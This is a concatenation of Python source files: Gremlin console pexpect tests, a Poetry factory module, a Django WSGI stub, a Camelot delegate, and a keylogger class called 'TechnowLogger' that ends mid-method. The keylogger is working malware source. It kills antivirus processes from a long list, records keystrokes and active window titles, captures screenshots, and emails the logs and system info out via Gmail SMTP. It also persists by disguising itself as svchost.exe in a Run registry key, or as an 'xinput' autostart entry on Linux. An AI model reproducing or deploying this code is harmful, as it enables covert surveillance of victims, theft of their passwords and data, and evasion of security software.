TestConsole._expect_prompt(child)
TestConsole._send(child, "z")
child.expect("==>argument=\[x, -i, =, --color, -D\]\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_dash_dash_interactive_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive y.script 1 2 3 --interactive x.script -i \"z.script x -i = --color -D\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "z")
child.expect("==>argument=\[x, -i, =, --color, -D\]\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_mixed_interactive_long_short_opts_with_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--interactive y.script 1 2 3 --interactive x.script -i \"z.script x -i = --color -D\"")
TestConsole._expect_gremlin_header(child)
TestConsole._send(child, "y")
child.expect("==>6\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "x")
child.expect("==>2\r\n")
TestConsole._expect_prompt(child)
TestConsole._send(child, "z")
child.expect("==>argument=\[x, -i, =, --color, -D\]\r\n")
TestConsole._expect_prompt(child)
TestConsole._close(child)
def test_just_dash_e(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e x-printed.script")
child.expect("2\r\n")
TestConsole._close(child)
def test_just_dash_e_file_not_found(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e=x-printed.script")
child.expect("Gremlin file not found at \[=x-printed.script\]\.\r\n")
child.expect(pexpect.EOF)
def test_just_dash_dash_execute(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute x-printed.script")
child.expect("2\r\n")
TestConsole._close(child)
def test_dash_e_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e y-printed.script 1 2 3")
child.expect("6\r\n")
TestConsole._close(child)
def test_dash_dash_execute_with_args(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute y-printed.script 1 2 3")
child.expect("6\r\n")
TestConsole._close(child)
def test_dash_e_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-e y-printed.script 1 2 3 -e x-printed.script -e \"z-printed.script x -e = --color -D\"")
child.expect("6\r\n")
child.expect("2\r\n")
child.expect("argument=\[x, -e, =, --color, -D\]\r\n")
TestConsole._close(child)
def test_dash_dash_execute_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute y-printed.script 1 2 3 --execute x-printed.script --execute \"z-printed.script x -e = --color -D\"")
child.expect("6\r\n")
child.expect("2\r\n")
child.expect("argument=\[x, -e, =, --color, -D\]\r\n")
TestConsole._close(child)
def test_mixed_execute_long_short_opts_with_multiple_scripts(self):
child = pexpect.spawn(TestConsole.gremlinsh + "--execute y-printed.script 1 2 3 -e x-printed.script --execute \"z-printed.script x -e = --color -D\"")
child.expect("6\r\n")
child.expect("2\r\n")
child.expect("argument=\[x, -e, =, --color, -D\]\r\n")
TestConsole._close(child)
def test_no_mix_dash_i_and_dash_e(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-i y.script 1 2 3 -i x.script -e \"z.script x -i --color -D\"")
child.expect("-i and -e options are mutually exclusive - provide one or the other")
child.expect(pexpect.EOF)
def test_debug_logging(self):
child = pexpect.spawn(TestConsole.gremlinsh + "-l DEBUG --execute y-printed.script 1 2 3")
child.expect("6\r\n")
TestConsole._close(child)
@staticmethod
def _expect_gremlin_header(child):
# skip/read the Gremlin graphics
child.expect("\r\n")
child.expect(["plugin activated: tinkerpop.server", "plugin activated: tinkerpop.utilities", "plugin activated: tinkerpop.tinkergraph"])
child.expect(["plugin activated: tinkerpop.server", "plugin activated: tinkerpop.utilities", "plugin activated: tinkerpop.tinkergraph"])
child.expect(["plugin activated: tinkerpop.server", "plugin activated: tinkerpop.utilities", "plugin activated: tinkerpop.tinkergraph"])
TestConsole._expect_prompt(child)
@staticmethod
def _send(child, line):
child.sendline(line)
child.expect(line + "\r\n")
@staticmethod
def _expect_prompt(child):
child.expect("gremlin> ")
@staticmethod
def _close(child):
child.sendline(":x")
|
py | b40b4210cca7a3bbd5f5a6bacb690bd3816245a8 | from pathlib import Path
from typing import TYPE_CHECKING
from typing import Dict
from typing import List
from typing import Optional
from cleo.io.null_io import NullIO
from poetry.config.config import Config
from poetry.config.file_config_source import FileConfigSource
from poetry.core.factory import Factory as BaseFactory
from poetry.core.toml.file import TOMLFile
from poetry.locations import CONFIG_DIR
from poetry.packages.locker import Locker
from poetry.packages.project_package import ProjectPackage
from poetry.plugins.plugin_manager import PluginManager
from poetry.poetry import Poetry
if TYPE_CHECKING:
from cleo.io.io import IO
from poetry.repositories.legacy_repository import LegacyRepository
class Factory(BaseFactory):
"""
Factory class to create various elements needed by Poetry.
"""
def create_poetry(
self,
cwd: Optional[Path] = None,
io: Optional["IO"] = None,
disable_plugins: bool = False,
) -> Poetry:
if io is None:
io = NullIO()
base_poetry = super().create_poetry(cwd)
locker = Locker(
base_poetry.file.parent / "poetry.lock", base_poetry.local_config
)
# Loading global configuration
config = self.create_config(io)
# Loading local configuration
local_config_file = TOMLFile(base_poetry.file.parent / "poetry.toml")
if local_config_file.exists():
if io.is_debug():
io.write_line(f"Loading configuration file {local_config_file.path}")
config.merge(local_config_file.read())
# Load local sources
repositories = {}
existing_repositories = config.get("repositories", {})
for source in base_poetry.pyproject.poetry_config.get("source", []):
name = source.get("name")
url = source.get("url")
if name and url and name not in existing_repositories:
repositories[name] = {"url": url}
config.merge({"repositories": repositories})
poetry = Poetry(
base_poetry.file.path,
base_poetry.local_config,
base_poetry.package,
locker,
config,
)
# Configuring sources
self.configure_sources(
poetry, poetry.local_config.get("source", []), config, io
)
plugin_manager = PluginManager("plugin", disable_plugins=disable_plugins)
plugin_manager.load_plugins()
poetry.set_plugin_manager(plugin_manager)
plugin_manager.activate(poetry, io)
return poetry
@classmethod
def get_package(cls, name: str, version: str) -> ProjectPackage:
return ProjectPackage(name, version, version)
@classmethod
def create_config(cls, io: Optional["IO"] = None) -> Config:
if io is None:
io = NullIO()
config = Config()
# Load global config
config_file = TOMLFile(Path(CONFIG_DIR) / "config.toml")
if config_file.exists():
if io.is_debug():
io.write_line(
"<debug>Loading configuration file {}</debug>".format(
config_file.path
)
)
config.merge(config_file.read())
config.set_config_source(FileConfigSource(config_file))
# Load global auth config
auth_config_file = TOMLFile(Path(CONFIG_DIR) / "auth.toml")
if auth_config_file.exists():
if io.is_debug():
io.write_line(
"<debug>Loading configuration file {}</debug>".format(
auth_config_file.path
)
)
config.merge(auth_config_file.read())
config.set_auth_config_source(FileConfigSource(auth_config_file))
return config
@classmethod
def configure_sources(
cls, poetry: Poetry, sources: List[Dict[str, str]], config: Config, io: "IO"
) -> None:
for source in sources:
repository = cls.create_legacy_repository(source, config)
is_default = source.get("default", False)
is_secondary = source.get("secondary", False)
if io.is_debug():
message = "Adding repository {} ({})".format(
repository.name, repository.url
)
if is_default:
message += " and setting it as the default one"
elif is_secondary:
message += " and setting it as secondary"
io.write_line(message)
poetry.pool.add_repository(repository, is_default, secondary=is_secondary)
# Put PyPI last to prefer private repositories
# unless we have no default source AND no primary sources
# (default = false, secondary = false)
if poetry.pool.has_default():
if io.is_debug():
io.write_line("Deactivating the PyPI repository")
else:
from poetry.repositories.pypi_repository import PyPiRepository
default = not poetry.pool.has_primary_repositories()
poetry.pool.add_repository(PyPiRepository(), default, not default)
@classmethod
def create_legacy_repository(
cls, source: Dict[str, str], auth_config: Config
) -> "LegacyRepository":
from poetry.repositories.legacy_repository import LegacyRepository
from poetry.utils.helpers import get_cert
from poetry.utils.helpers import get_client_cert
if "url" in source:
# PyPI-like repository
if "name" not in source:
raise RuntimeError("Missing [name] in source.")
else:
raise RuntimeError("Unsupported source specified")
name = source["name"]
url = source["url"]
return LegacyRepository(
name,
url,
config=auth_config,
cert=get_cert(auth_config, name),
client_cert=get_client_cert(auth_config, name),
)
@classmethod
def create_pyproject_from_package(cls, package: ProjectPackage, path: Path) -> None:
import tomlkit
from poetry.layouts.layout import POETRY_DEFAULT
pyproject = tomlkit.loads(POETRY_DEFAULT)
content = pyproject["tool"]["poetry"]
content["name"] = package.name
content["version"] = package.version.text
content["description"] = package.description
content["authors"] = package.authors
dependency_section = content["dependencies"]
dependency_section["python"] = package.python_versions
for dep in package.requires:
constraint = tomlkit.inline_table()
if dep.is_vcs():
constraint[dep.vcs] = dep.source_url
if dep.reference:
constraint["rev"] = dep.reference
elif dep.is_file() or dep.is_directory():
constraint["path"] = dep.source_url
else:
constraint["version"] = dep.pretty_constraint
if not dep.marker.is_any():
constraint["markers"] = str(dep.marker)
if dep.extras:
constraint["extras"] = sorted(dep.extras)
if len(constraint) == 1 and "version" in constraint:
constraint = constraint["version"]
dependency_section[dep.name] = constraint
path.joinpath("pyproject.toml").write_text(
pyproject.as_string(), encoding="utf-8"
)
|
py | b40b44ef23ac82cd0836709d959f00264cf1aff6 | """
WSGI config for bleacherstime_33873 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bleacherstime_33873.settings')
application = get_wsgi_application()
|
py | b40b452e0082a3d83e27bac94488da6434d4d53f | # ============================================================================
#
# Copyright (C) 2007-2016 Conceptive Engineering bvba.
# www.conceptive.be / [email protected]
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Conceptive Engineering nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ============================================================================
import logging
logger = logging.getLogger('camelot.view.controls.delegates.localfiledelegate')
import six
from ....core.qt import variant_to_py, Qt
from .customdelegate import CustomDelegate
from .customdelegate import DocumentationMetaclass
from camelot.view.controls import editors
from camelot.view.proxy import ValueLoading
@six.add_metaclass(DocumentationMetaclass)
class LocalFileDelegate(CustomDelegate):
"""Delegate for displaying a path on the local file system. This path can
either point to a file or a directory
"""
editor = editors.LocalFileEditor
def __init__(
self,
parent=None,
**kw
):
CustomDelegate.__init__(self, parent, **kw)
def paint(self, painter, option, index):
painter.save()
self.drawBackground(painter, option, index)
value = variant_to_py( index.model().data( index, Qt.EditRole ) )
value_str = u''
if value not in (None, ValueLoading):
value_str = six.text_type(value)
self.paint_text(painter, option, index, value_str)
painter.restore()
|
py | b40b46444ba3fb801c43b2b99730cb94648ddb05 | #!/usr/bin/env python
import pynput.keyboard
import threading
import smtplib
import os
import shutil
import subprocess
import sys
import stat
import platform
import getpass
import time
import tempfile
from mss import mss
# 15 to 18 lines for "send_mail_with_attachment()" function
#==============================================================
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
from os.path import basename
#==============================================================
try:
import win32gui as w # Used to Get The Active Window Name
except Exception:
pass
class Keylogger:
def __init__(self, time_interval, email, password):
self.log = ""
self.interval = time_interval
self.email = email
self.password = password
self.temp_screenshot = tempfile.gettempdir() + "\\screenshot.png"
self.system_info = self.get_system_info()
self.lastWindow = "" #Used to Distinguish Log Data
self.victim_system = platform.system()
def kill_av(self):
try:
os.popen("net stop \"Security Center\"")
except Exception as e:
print("[!] Unable to Disable Security Center!\n")
print(f"Error : {e}")
try:
avs=['AAWTray.exe', 'Ad-Aware.exe', 'MSASCui.exe', '_avp32.exe', '_avpcc.exe', '_avpm.exe', 'aAvgApi.exe', 'ackwin32.exe', 'adaware.exe', 'advxdwin.exe', 'agentsvr.exe', 'agentw.exe', 'alertsvc.exe', 'alevir.exe', 'alogserv.exe', 'amon9x.exe', 'anti-trojan.exe', 'antivirus.exe', 'ants.exe', 'apimonitor.exe', 'aplica32.exe', 'apvxdwin.exe', 'arr.exe', 'atcon.exe', 'atguard.exe', 'atro55en.exe', 'atupdater.exe', 'atwatch.exe', 'au.exe', 'aupdate.exe', 'auto-protect.nav80try.exe', 'autodown.exe', 'autotrace.exe', 'autoupdate.exe', 'avconsol.exe', 'ave32.exe', 'avgcc32.exe', 'avgctrl.exe', 'avgemc.exe', 'avgnt.exe', 'avgrsx.exe', 'avgserv.exe', 'avgserv9.exe', 'avguard.exe', 'avgw.exe', 'avkpop.exe', 'avkserv.exe', 'avkservice.exe', 'avkwctl9.exe', 'avltmain.exe', 'avnt.exe', 'avp.exe', 'avp.exe', 'avp32.exe', 'avpcc.exe', 'avpdos32.exe', 'avpm.exe', 'avptc32.exe', 'avpupd.exe', 'avsched32.exe', 'avsynmgr.exe', 'avwin.exe', 'avwin95.exe', 'avwinnt.exe', 'avwupd.exe', 'avwupd32.exe', 'avwupsrv.exe', 'avxmonitor9x.exe', 'avxmonitornt.exe', 'avxquar.exe', 'backweb.exe', 'bargains.exe', 'bd_professional.exe', 'beagle.exe', 'belt.exe', 'bidef.exe', 'bidserver.exe', 'bipcp.exe', 'bipcpevalsetup.exe', 'bisp.exe', 'blackd.exe', 'blackice.exe', 'blink.exe', 'blss.exe', 'bootconf.exe', 'bootwarn.exe', 'borg2.exe', 'bpc.exe', 'brasil.exe', 'bs120.exe', 'bundle.exe', 'bvt.exe', 'ccapp.exe', 'ccevtmgr.exe', 'ccpxysvc.exe', 'cdp.exe', 'cfd.exe', 'cfgwiz.exe', 'cfiadmin.exe', 'cfiaudit.exe', 'cfinet.exe', 'cfinet32.exe', 'claw95.exe', 'claw95cf.exe', 'clean.exe', 'cleaner.exe', 'cleaner3.exe', 'cleanpc.exe', 'click.exe', 'cmesys.exe', 'cmgrdian.exe', 'cmon016.exe', 'connectionmonitor.exe', 'cpd.exe', 'cpf9x206.exe', 'cpfnt206.exe', 'ctrl.exe', 'cv.exe', 'cwnb181.exe', 'cwntdwmo.exe', 'datemanager.exe', 'dcomx.exe', 'defalert.exe', 'defscangui.exe', 'defwatch.exe', 'deputy.exe', 'divx.exe', 'dllcache.exe', 'dllreg.exe', 'doors.exe', 'dpf.exe', 'dpfsetup.exe', 'dpps2.exe', 'drwatson.exe', 'drweb32.exe', 'drwebupw.exe', 'dssagent.exe', 'dvp95.exe', 'dvp95_0.exe', 'ecengine.exe', 'efpeadm.exe', 'emsw.exe', 'ent.exe', 'esafe.exe', 'escanhnt.exe', 'escanv95.exe', 'espwatch.exe', 'ethereal.exe', 'etrustcipe.exe', 'evpn.exe', 'exantivirus-cnet.exe', 'exe.avxw.exe', 'expert.exe', 'explore.exe', 'f-agnt95.exe', 'f-prot.exe', 'f-prot95.exe', 'f-stopw.exe', 'fameh32.exe', 'fast.exe', 'fch32.exe', 'fih32.exe', 'findviru.exe', 'firewall.exe', 'fnrb32.exe', 'fp-win.exe', 'fp-win_trial.exe', 'fprot.exe', 'frw.exe', 'fsaa.exe', 'fsav.exe', 'fsav32.exe', 'fsav530stbyb.exe', 'fsav530wtbyb.exe', 'fsav95.exe', 'fsgk32.exe', 'fsm32.exe', 'fsma32.exe', 'fsmb32.exe', 'gator.exe', 'gbmenu.exe', 'gbpoll.exe', 'generics.exe', 'gmt.exe', 'guard.exe', 'guarddog.exe', 'hacktracersetup.exe', 'hbinst.exe', 'hbsrv.exe', 'hotactio.exe', 'hotpatch.exe', 'htlog.exe', 'htpatch.exe', 'hwpe.exe', 'hxdl.exe', 'hxiul.exe', 'iamapp.exe', 'iamserv.exe', 'iamstats.exe', 'ibmasn.exe', 'ibmavsp.exe', 'icload95.exe', 'icloadnt.exe', 'icmon.exe', 'icsupp95.exe', 'icsuppnt.exe', 'idle.exe', 'iedll.exe', 'iedriver.exe', 'iexplorer.exe', 'iface.exe', 'ifw2000.exe', 'inetlnfo.exe', 'infus.exe', 'infwin.exe', 'init.exe', 'intdel.exe', 'intren.exe', 'iomon98.exe', 'istsvc.exe', 'jammer.exe', 'jdbgmrg.exe', 'jedi.exe', 'kavlite40eng.exe', 'kavpers40eng.exe', 'kavpf.exe', 'kazza.exe', 'keenvalue.exe', 'kerio-pf-213-en-win.exe', 'kerio-wrl-421-en-win.exe', 'kerio-wrp-421-en-win.exe', 'kernel32.exe', 'killprocesssetup161.exe', 'launcher.exe', 'ldnetmon.exe', 'ldpro.exe', 'ldpromenu.exe', 'ldscan.exe', 'lnetinfo.exe', 'loader.exe', 'localnet.exe', 'lockdown.exe', 'lockdown2000.exe', 'lookout.exe', 'lordpe.exe', 'lsetup.exe', 'luall.exe', 'luau.exe', 'lucomserver.exe', 'luinit.exe', 'luspt.exe', 'mapisvc32.exe', 'mcagent.exe', 'mcmnhdlr.exe', 'mcshield.exe', 'mctool.exe', 'mcupdate.exe', 'mcvsrte.exe', 'mcvsshld.exe', 'md.exe', 'mfin32.exe', 'mfw2en.exe', 'mfweng3.02d30.exe', 'mgavrtcl.exe', 'mgavrte.exe', 'mghtml.exe', 'mgui.exe', 'minilog.exe', 'mmod.exe', 'monitor.exe', 'moolive.exe', 'mostat.exe', 'mpfagent.exe', 'mpfservice.exe', 'mpftray.exe', 'mrflux.exe', 'msapp.exe', 'msbb.exe', 'msblast.exe', 'mscache.exe', 'msccn32.exe', 'mscman.exe', 'msconfig.exe', 'msdm.exe', 'msdos.exe', 'msiexec16.exe', 'msinfo32.exe', 'mslaugh.exe', 'msmgt.exe', 'msmsgri32.exe', 'mssmmc32.exe', 'mssys.exe', 'msvxd.exe', 'mu0311ad.exe', 'mwatch.exe', 'n32scanw.exe', 'nav.exe', 'navap.navapsvc.exe', 'navapsvc.exe', 'navapw32.exe', 'navdx.exe', 'navlu32.exe', 'navnt.exe', 'navstub.exe', 'navw32.exe', 'navwnt.exe', 'nc2000.exe', 'ncinst4.exe', 'ndd32.exe', 'neomonitor.exe', 'neowatchlog.exe', 'netarmor.exe', 'netd32.exe', 'netinfo.exe', 'netmon.exe', 'netscanpro.exe', 'netspyhunter-1.2.exe', 'netstat.exe', 'netutils.exe', 'nisserv.exe', 'nisum.exe', 'nmain.exe', 'nod32.exe', 'normist.exe', 'norton_internet_secu_3.0_407.exe', 'notstart.exe', 'npf40_tw_98_nt_me_2k.exe', 'npfmessenger.exe', 'nprotect.exe', 'npscheck.exe', 'npssvc.exe', 'nsched32.exe', 'nssys32.exe', 'nstask32.exe', 'nsupdate.exe', 'nt.exe', 'ntrtscan.exe', 'ntvdm.exe', 'ntxconfig.exe', 'nui.exe', 'nupgrade.exe', 'nvarch16.exe', 'nvc95.exe', 'nvsvc32.exe', 'nwinst4.exe', 'nwservice.exe', 'nwtool16.exe', 'ollydbg.exe', 'onsrvr.exe', 'optimize.exe', 'ostronet.exe', 'otfix.exe', 'outpost.exe', 'outpostinstall.exe', 'outpostproinstall.exe', 'padmin.exe', 'panixk.exe', 'patch.exe', 'pavcl.exe', 'pavproxy.exe', 'pavsched.exe', 'pavw.exe', 'pccwin98.exe', 'pcfwallicon.exe', 'pcip10117_0.exe', 'pcscan.exe', 'pdsetup.exe', 'periscope.exe', 'persfw.exe', 'perswf.exe', 'pf2.exe', 'pfwadmin.exe', 'pgmonitr.exe', 'pingscan.exe', 'platin.exe', 'pop3trap.exe', 'poproxy.exe', 'popscan.exe', 'portdetective.exe', 'portmonitor.exe', 'powerscan.exe', 'ppinupdt.exe', 'pptbc.exe', 'ppvstop.exe', 'prizesurfer.exe', 'prmt.exe', 'prmvr.exe', 'procdump.exe', 'processmonitor.exe', 'procexplorerv1.0.exe', 'programauditor.exe', 'proport.exe', 'protectx.exe', 'pspf.exe', 'purge.exe', 'qconsole.exe', 'qserver.exe', 'rapapp.exe', 'rav7.exe', 'rav7win.exe', 'rav8win32eng.exe', 'ray.exe', 'rb32.exe', 'rcsync.exe', 'realmon.exe', 'reged.exe', 'regedit.exe', 'regedt32.exe', 'rescue.exe', 'rescue32.exe', 'rrguard.exe', 'rshell.exe', 'rtvscan.exe', 'rtvscn95.exe', 'rulaunch.exe', 'run32dll.exe', 'rundll.exe', 'rundll16.exe', 'ruxdll32.exe', 'safeweb.exe', 'sahagent.exe', 'save.exe', 'savenow.exe', 'sbserv.exe', 'sc.exe', 'scam32.exe', 'scan32.exe', 'scan95.exe', 'scanpm.exe', 'scrscan.exe', 'serv95.exe', 'setup_flowprotector_us.exe', 'setupvameeval.exe', 'sfc.exe', 'sgssfw32.exe', 'sh.exe', 'shellspyinstall.exe', 'shn.exe', 'showbehind.exe', 'smc.exe', 'sms.exe', 'smss32.exe', 'soap.exe', 'sofi.exe', 'sperm.exe', 'spf.exe', 'sphinx.exe', 'spoler.exe', 'spoolcv.exe', 'spoolsv32.exe', 'spyxx.exe', 'srexe.exe', 'srng.exe', 'ss3edit.exe', 'ssg_4104.exe', 'ssgrate.exe', 'st2.exe', 'start.exe', 'stcloader.exe', 'supftrl.exe', 'support.exe', 'supporter5.exe', 'svc.exe', 'svchostc.exe', 'svchosts.exe', 'svshost.exe', 'sweep95.exe', 'sweepnet.sweepsrv.sys.swnetsup.exe', 'symproxysvc.exe', 'symtray.exe', 'sysedit.exe', 'system.exe', 'system32.exe', 'sysupd.exe', 'taskmg.exe', 'taskmgr.exe', 'taskmo.exe', 'taskmon.exe', 'taumon.exe', 'tbscan.exe', 'tc.exe', 'tca.exe', 'tcm.exe', 'tds-3.exe', 'tds2-98.exe', 'tds2-nt.exe', 'teekids.exe', 'tfak.exe', 'tfak5.exe', 'tgbob.exe', 'titanin.exe', 'titaninxp.exe', 'tracert.exe', 'trickler.exe', 'trjscan.exe', 'trjsetup.exe', 'trojantrap3.exe', 'tsadbot.exe', 'tvmd.exe', 'tvtmd.exe', 'undoboot.exe', 'updat.exe', 'update.exe', 'upgrad.exe', 'utpost.exe', 'vbcmserv.exe', 'vbcons.exe', 'vbust.exe', 'vbwin9x.exe', 'vbwinntw.exe', 'vcsetup.exe', 'vet32.exe', 'vet95.exe', 'vettray.exe', 'vfsetup.exe', 'vir-help.exe', 'virusmdpersonalfirewall.exe', 'vnlan300.exe', 'vnpc3000.exe', 'vpc32.exe', 'vpc42.exe', 'vpfw30s.exe', 'vptray.exe', 'vscan40.exe', 'vscenu6.02d30.exe', 'vsched.exe', 'vsecomr.exe', 'vshwin32.exe', 'vsisetup.exe', 'vsmain.exe', 'vsmon.exe', 'vsstat.exe', 'vswin9xe.exe', 'vswinntse.exe', 'vswinperse.exe', 'w32dsm89.exe', 'w9x.exe', 'watchdog.exe', 'webdav.exe', 'webscanx.exe', 'webtrap.exe', 'wfindv32.exe', 'whoswatchingme.exe', 'wimmun32.exe', 'win-bugsfix.exe', 'win32.exe', 'win32us.exe', 'winactive.exe', 'window.exe', 'windows.exe', 'wininetd.exe', 'wininitx.exe', 'winlogin.exe', 'winmain.exe', 'winnet.exe', 'winppr32.exe', 'winrecon.exe', 'winservn.exe', 'winssk32.exe', 'winstart.exe', 'winstart001.exe', 'wintsk32.exe', 'winupdate.exe', 'wkufind.exe', 'wnad.exe', 'wnt.exe', 'wradmin.exe', 'wrctrl.exe', 'wsbgate.exe', 'wupdater.exe', 'wupdt.exe', 'wyvernworksfirewall.exe', 'xpf202en.exe', 'zapro.exe', 'zapsetup3001.exe', 'zatutor.exe', 'zonalm2601.exe', 'zonealarm.exe']
processes=os.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read()
ps=[]
for i in processes.split(" "):
if ".exe" in i:
ps.append(i.replace("K\n","").replace("\n",""))
print("[*] Killing Antivirus services on this pc")
for av in avs:
for p in ps:
if p==av:
print("[*] killing off "+av)
os.popen("TASKKILL /F /IM {}".format(p))
except Exception as e:
print("[!] Unable to Kill AV")
def append_to_log(self, string):
self.log = self.log + string
def get_system_info(self):
uname = platform.uname()
os = uname[0] + " " + uname[2] + " " + uname[3]
computer_name = uname[1]
user = getpass.getuser()
return "Operating System:\t" + os + "\nComputer Name:\t\t" + computer_name + "\nUser:\t\t\t\t" + user
def process_key_press(self, key):
current_key = ""
if self.victim_system == 'Windows':
try:
CurrentWindowName = w.GetWindowText(w.GetForegroundWindow())
if self.lastWindow != CurrentWindowName:
self.lastWindow = CurrentWindowName
current_key = f"\n\n[OnWard Data Entered In : {CurrentWindowName}]\n"
except Exception:
print("[!] Failed to Start \"Log Distinguisher Function\"")
try:
current_key += str(key.char)
except AttributeError:
if key == key.space:
current_key += " "
elif key == key.enter:
current_key += " [ENTER] "
elif key == key.backspace:
current_key += " [BACKSPACE] "
elif key == key.ctrl_l or key == key.ctrl_r:
current_key += " [CTRL] "
elif key == key.shift or key == key.shift_r:
current_key += " [SHIFT] "
elif key == key.delete:
current_key += " [DELETE] "
elif key == key.esc:
current_key += " [ESC] "
elif key == key.tab:
current_key += " [TAB] "
elif key == key.up:
current_key += " [UP] "
elif key == key.down:
current_key += " [DOWN] "
elif key == key.left:
current_key += " [LEFT] "
elif key == key.right:
current_key += " [RIGHT] "
elif key == key.cmd or key == key.cmd_r:
current_key += " [WINDOWS-KEY] "
elif key == key.f1:
current_key += " [F1] "
elif key == key.f2:
current_key += " [F2] "
elif key == key.f3:
current_key += " [F3] "
elif key == key.f4:
current_key += " [F4] "
elif key == key.f5:
current_key += " [F5] "
elif key == key.f6:
current_key += " [F6] "
elif key == key.f7:
current_key += " [F7] "
elif key == key.f8:
current_key += " [F8] "
elif key == key.f9:
current_key += " [F9] "
elif key == key.f10:
current_key += " [F10] "
elif key == key.f11:
current_key += " [F11] "
elif key == key.f12:
current_key += " [F12] "
elif key == key.alt_l or key == key.alt_r:
current_key += " [ALT] "
elif key == key.caps_lock:
current_key += " [CAPSLOCK] "
elif key == key.home:
current_key += " [HOME] "
else:
current_key += " " + str(key) + " "
self.append_to_log(current_key)
def report(self):
self.send_mail(self.log)
self.log = ""
self.take_screenshot()
self.send_mail_with_attachment(files= [self.temp_screenshot])
timer = threading.Timer(self.interval, self.report)
timer.start()
def take_screenshot(self):
try:
os.remove('screenshot.png')
except Exception as e:
pass
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
with mss() as screenshot:
screenshot.shot(output="screenshot.png")
def send_mail(self, message):
try:
message = "Subject: TechnowLogger Reporting\n\n" + "Report From:\n\n" + self.system_info + "\n\nLogs:\n" + message
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(self.email, self.password)
server.sendmail(self.email, self.email, message)
server.quit()
except Exception as e:
time.sleep(15)
self.send_mail(self.log)
def send_mail_with_attachment(self, files= None):
try:
msg = MIMEMultipart()
msg['From'] = self.email
msg['To'] = self.email
msg['Subject'] = "TechnowLogger Reporting With Screenshot Attachments"
text = "\nReport From:\n\n" + self.system_info
msg.attach(MIMEText(text))
for f in files or []:
with open(f, "rb") as fil:
ext = f.split('.')[-1:]
attachedfile = MIMEApplication(fil.read(), _subtype = ext)
attachedfile.add_header(
'content-disposition', 'attachment', filename=basename(f) )
msg.attach(attachedfile)
smtp = smtplib.SMTP(host="smtp.gmail.com", port= 587)
smtp.starttls()
smtp.login(self.email, self.password)
smtp.sendmail(self.email, self.email, msg.as_string())
smtp.close()
except Exception as e:
time.sleep(15)
self.take_screenshot()
self.send_mail_with_attachment(files= [self.temp_screenshot])
def start(self):
keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
with keyboard_listener:
self.report()
keyboard_listener.join()
def become_persistent(self, time_persistent):
if sys.platform.startswith("win"):
self.become_persistent_on_windows(time_persistent)
elif sys.platform.startswith("linux"):
self.become_persistent_on_linux(time_persistent)
def become_persistent_on_windows(self, time_persistent):
evil_file_location = os.environ["appdata"] + "\\svchost.exe"
if not os.path.exists(evil_file_location):
time.sleep(time_persistent)
self.log = "** TechNowlogger started on Windows System ** "
shutil.copyfile(sys.executable, evil_file_location)
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "' + evil_file_location + '"', shell=True)
def become_persistent_on_linux(self, time_persistent):
home_config_directory = os.path.expanduser('~') + "/.config/"
autostart_path = home_config_directory + "/autostart/"
autostart_file = autostart_path + "xinput.desktop"
if not os.path.isfile(autostart_file):
time.sleep(time_persistent)
self.log = "** TechNowlogger started On Linux System **"
try:
os.makedirs(autostart_path)
except OSError:
pass
destination_file = home_config_directory + "xnput"
shutil.copyfile(sys.executable, destination_file)
self.chmod_to_exec(destination_file)
with open(autostart_file, 'w') as out:
out.write("[Desktop Entry]\nType=Application\nX-GNOME-Autostart-enabled=true\n")
out.write("Name=Xinput\nExec=" + destination_file + "\n")
self.chmod_to_exec(autostart_file)
subprocess.Popen(destination_file)
sys.exit()
def chmod_to_exec(self, file):
